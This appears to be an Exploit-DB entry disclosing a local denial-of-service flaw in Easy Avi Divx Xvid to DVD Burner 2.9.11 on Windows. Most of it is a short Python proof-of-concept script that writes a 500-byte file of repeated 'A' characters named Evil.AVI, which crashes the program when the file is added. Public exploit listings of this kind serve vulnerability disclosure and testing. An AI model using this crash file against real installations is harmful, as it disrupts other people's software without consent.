Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of Service

EDB-ID:

44338

CVE:

N/A

E-DB Verified:

Author:

Hashim Jawad

Type:

dos

Exploit: /

Platform:

Windows

Published:

2018-03-23

Vulnerable App:

#!/usr/bin/python
###########################################################################################
# Exploit Title      : Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service #
# Exploit Author     : Hashim Jawad                                                       #
# Twitter            : @ihack4falafel                                                     # 
# Author Website     : ihack4falafel[.]com                                                #
# Vendor Homepage    : http://www.divxtodvd.net/index.htm                                 #
# Vulnerable Software: http://www.divxtodvd.net/easy_divx_to_dvd.exe                      #
# Tested on OS       : Windows XP professional SP3                                        #
#                      Windows 10 professional 64-bit                                     #
# Steps to reproduce : Add Evil.AVI and BOOM!                                             #
###########################################################################################

buffer = "A" * 500

try:
	f=open("Evil.AVI","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"

Tags: Denial of Service (DoS) Local

Advisory/Source: Link

Downloads	Certifications	Training	Professional Services
Kali Linux	OSCP	Penetration Testing with Kali Linux (PWK)	Penetration Testing
Kali NetHunter	OSWP	Offensive Security Wireless Attacks (WiFu)	Advanced Attack Simulation
Kali Linux Revealed Book	OSCE	Cracking the Perimeter (CTP)	Application Security Assessment
	OSEE	Metasploit Unleashed (MSFU)
	OSWE	Free Kali Linux Training
	KLCP